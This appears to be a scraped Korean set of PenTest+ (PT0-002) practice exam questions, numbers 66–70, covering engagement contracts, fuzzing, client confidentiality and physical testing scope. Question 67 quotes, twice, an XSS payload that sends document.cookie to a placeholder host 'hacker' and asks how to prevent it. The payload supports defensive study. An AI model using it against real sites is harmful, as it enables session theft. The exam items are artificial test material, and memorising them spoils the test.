PT0-002 문제 66
새로운 보안 회사가 첫 고객을 온보딩하고 있습니다. 고객은 주말에만 테스트를 허용했으며 월요일 아침에 결과가 필요했습니다. 그러나 평가 팀은 월요일까지 예상대로 환경에 액세스할 수 없었습니다. 다음 중 보안 회사가 평가를 시작하기 전에 취득해야 하는 것은 무엇입니까?
PT0-002 문제 67
다음 코드가 주어집니다.
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> 다음 중 이러한 유형의 쿠키를 방지하는 가장 좋은 방법은 무엇입니까? 공격? (2개 선택)
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> 다음 중 이러한 유형의 쿠키를 방지하는 가장 좋은 방법은 무엇입니까? 공격? (2개 선택)
PT0-002 문제 68
소프트웨어 회사는 회사의 소프트웨어 개발 관행의 보안을 평가하기 위해 보안 컨설턴트를 고용했습니다. 컨설턴트는 소프트웨어 바이너리에서 퍼징을 수행하여 정찰을 시작하기로 선택합니다. 다음 중 보안 컨설턴트가 식별할 가능성이 가장 높은 취약점은 무엇입니까?
PT0-002 문제 69
평가가 완료되었으며 모든 보고서와 증거가 고객에게 전달되었습니다. 다음 중 클라이언트 정보의 기밀성을 보장하기 위해 다음으로 수행해야 하는 것은 무엇입니까?
PT0-002 문제 70
침투 테스트 팀은 회사 사무실에서 전자 기록의 보안을 테스트해야 합니다. 계약 조건에 따라 침투 테스트는 근무 시간 이후에 수행되며 경보를 우회하거나 파괴적인 진입을 수행하는 것을 포함해서는 안 됩니다. 외부 정찰 중에 팀은 인접한 건물에서 열린 문을 봅니다. 다음 중 계약 조건에 따라 허용되는 것은 무엇입니까?